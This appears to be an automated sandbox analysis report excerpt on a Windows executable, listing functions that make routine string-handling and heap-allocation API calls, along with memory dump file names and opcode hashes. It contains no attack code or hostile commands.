                                • Opcode ID: 5abe4812c739e189f9b569cd320a2a419d2f6e86c823b18ef5435f3598e28fc6
                                • Instruction ID: c900a2ca4e4ec57ec07443ffbe850c19d237ec2ba9c615527026e6db5a8214a0
                                • Opcode Fuzzy Hash: 5abe4812c739e189f9b569cd320a2a419d2f6e86c823b18ef5435f3598e28fc6
                                • Instruction Fuzzy Hash: 85F0FCF09016196BE7209B749D49BF776A8AF54304F048692FB85E7290DFF89D808798
                                Function 004F8FD1 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __getptd.LIBCMT ref: 004F8FDD
                                  • Part of subcall function 004F87FF: __amsg_exit.LIBCMT ref: 004F880F
                                • __getptd.LIBCMT ref: 004F8FF4
                                • __amsg_exit.LIBCMT ref: 004F9002
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 004F9026
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: 34302941c5ff0eddb4a3ad8935a6fa08757ddf7211907dcc3f767a96d3450f8c
                                • Instruction ID: 2ed415e87eb4f32d2434c02918553f57db1c8db37f92a9b0863a4e1bb2861b95
                                • Opcode Fuzzy Hash: 34302941c5ff0eddb4a3ad8935a6fa08757ddf7211907dcc3f767a96d3450f8c
                                • Instruction Fuzzy Hash: 6BF0963294861C9FD761BB7A9806B7E33A06F00768F24410FF6446A2D3DF6C5940DA6D
                                Function 004F7310 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(------,004D5BEB), ref: 004F731B
                                • lstrcpy.KERNEL32(00000000), ref: 004F733F
                                • lstrcat.KERNEL32(?,------), ref: 004F7349
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcatlstrcpylstrlen
                                • String ID: ------
                                • API String ID: 3050337572-882505780
                                • Opcode ID: 576ad124bea4e3d2ac677fcd73d9dae0cd18ec899fa63e765f03183cc21529f9
                                • Instruction ID: 4aee1451a28b90dd2bab73672b69205e972c514ea2fe9df7dd27840a06f03ee5
                                • Opcode Fuzzy Hash: 576ad124bea4e3d2ac677fcd73d9dae0cd18ec899fa63e765f03183cc21529f9
                                • Instruction Fuzzy Hash: AAF015B46003029FDB249F75D848927BAF8AF84700318892EACDAC7324EA38E840CB14
                                Function 004E33D0 Relevance: 5.5, APIs: 4, Instructions: 486stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D1557
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D1579
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D159B
                                  • Part of subcall function 004D1530: lstrcpy.KERNEL32(00000000,?), ref: 004D15FF
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E3422
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E344B
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E3471
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E3497
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: f6c475306017ea26e8ca33e6ede58dd1d953c8ef450366ee6a598b14df79cd48
                                • Instruction ID: 7bf664ae55ac136bb37b99ce7fa276e6cac3e059100338a1803b864eefdf191a
                                • Opcode Fuzzy Hash: f6c475306017ea26e8ca33e6ede58dd1d953c8ef450366ee6a598b14df79cd48
                                • Instruction Fuzzy Hash: 29120F70A012419FDB29CF2AC558726B7E4BF4471AB19C1AED409CB3A2D77ADD42CF48
                                Function 004E7C20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 004E7C94
                                • std::_Xinvalid_argument.LIBCPMT ref: 004E7CAF
                                  • Part of subcall function 004E7D40: std::_Xinvalid_argument.LIBCPMT ref: 004E7D58
                                  • Part of subcall function 004E7D40: std::_Xinvalid_argument.LIBCPMT ref: 004E7D76
                                  • Part of subcall function 004E7D40: std::_Xinvalid_argument.LIBCPMT ref: 004E7D91
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_
                                • String ID: string too long
                                • API String ID: 909987262-2556327735
                                • Opcode ID: 81a95c1d90cdf48b3b42a07f3b013d6c181a4cf6d0e88c456bab86da89714d96
                                • Instruction ID: 9047d57111b66ea2c9bb367307b3d035aa269140c1c2493aef281f71837685cb
                                • Opcode Fuzzy Hash: 81a95c1d90cdf48b3b42a07f3b013d6c181a4cf6d0e88c456bab86da89714d96
                                • Instruction Fuzzy Hash: 053127723082844BE724DE6EE88092AF3EDEF91731B30452BF1418B740D7659C41839D
                                Function 004D6EF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,?), ref: 004D6F74
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004D6F7B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcess
                                • String ID: @
                                • API String ID: 1357844191-2766056989
                                • Opcode ID: 1f81dbdcfc458d5b1fcfb828f4decb010cf4aa6a77bcdc08890fa4bb0a8724a0
                                • Instruction ID: d72caad221646112707e90fcc2c86db3a329eba1113202e9c39ed79ec58e7f33
                                • Opcode Fuzzy Hash: 1f81dbdcfc458d5b1fcfb828f4decb010cf4aa6a77bcdc08890fa4bb0a8724a0
                                • Instruction Fuzzy Hash: B4219D70600A019BEB208F20D890BBB73B8EB45704F45886EE986CBB81FB78E945C754
                                Function 004F2400 Relevance: 5.2, APIs: 4, Instructions: 234stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004F244C
                                • lstrlen.KERNEL32(00000000), ref: 004F24E9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F2570
                                • lstrlen.KERNEL32(00000000), ref: 004F2577
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: ed2a2b8b39cbf753e6a4c3a0ad89c59955ab6443765c2745c0404eb84d638dcd
                                • Instruction ID: 4690f2a0cbf5d3c4cd5beb3f72babce8800830bbce40eff35bb972bbf1bf3dd8
                                • Opcode Fuzzy Hash: ed2a2b8b39cbf753e6a4c3a0ad89c59955ab6443765c2745c0404eb84d638dcd
                                • Instruction Fuzzy Hash: AC81F4B0E0020E9BDB10CB95CD54BBEB7B5EF84304F14816EE604A7381EBB99D45CB98
                                Function 004F1570 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 004F15A1
                                • lstrcpy.KERNEL32(00000000,?), ref: 004F15D9
                                • lstrcpy.KERNEL32(00000000,?), ref: 004F1611
                                • lstrcpy.KERNEL32(00000000,?), ref: 004F1649
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 4064b077e90b58e56c06589f38847abdbb46e271b3838fd849c3281e3c7b474f
                                • Instruction ID: e1ab0fc8aadb92aa348ecb4e767a6324457b118dd2f9652e55a3f34e82a40e9c
                                • Opcode Fuzzy Hash: 4064b077e90b58e56c06589f38847abdbb46e271b3838fd849c3281e3c7b474f
                                • Instruction Fuzzy Hash: 9F212AB0701B06DBD724DF2AC564A27B7F4AF54700B044A1EE586C7B61DB38E801CB98
                                Function 004D1530 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004D1610: lstrcpy.KERNEL32(00000000), ref: 004D162D
                                  • Part of subcall function 004D1610: lstrcpy.KERNEL32(00000000,?), ref: 004D164F
                                  • Part of subcall function 004D1610: lstrcpy.KERNEL32(00000000,?), ref: 004D1671
                                  • Part of subcall function 004D1610: lstrcpy.KERNEL32(00000000,?), ref: 004D1693
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D1557
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D1579
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D159B
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D15FF
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: cf63a8a46b49b2a56b4559bd0f639d3693a131e7221357da6c689bb6be01c1d0
                                • Instruction ID: 932f5114a257f6c3b00cfda505817d02f4d011beaf31d276fecdc97058077324
                                • Opcode Fuzzy Hash: cf63a8a46b49b2a56b4559bd0f639d3693a131e7221357da6c689bb6be01c1d0
                                • Instruction Fuzzy Hash: 7431C6B4A01B42AFD724DF3AD568953B7E5BF48304700492FA996C3B20DB78F811CB84
                                Function 004D1610 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 004D162D
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D164F
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D1671
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D1693
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 19b91ec2eae3c4e37f3f5ee0d5a22e88757eab2a66cda44c27d8c15b4f9b9134
                                • Instruction ID: 55b5e7f088eb9b1a56eeebf54617f390b62be25a7e70d302997662e8de6299c1
                                • Opcode Fuzzy Hash: 19b91ec2eae3c4e37f3f5ee0d5a22e88757eab2a66cda44c27d8c15b4f9b9134
                                • Instruction Fuzzy Hash: 3A1100B4611702ABDB149F36D528927B7F8AF54705708462FA896C3B60EB78E801CB58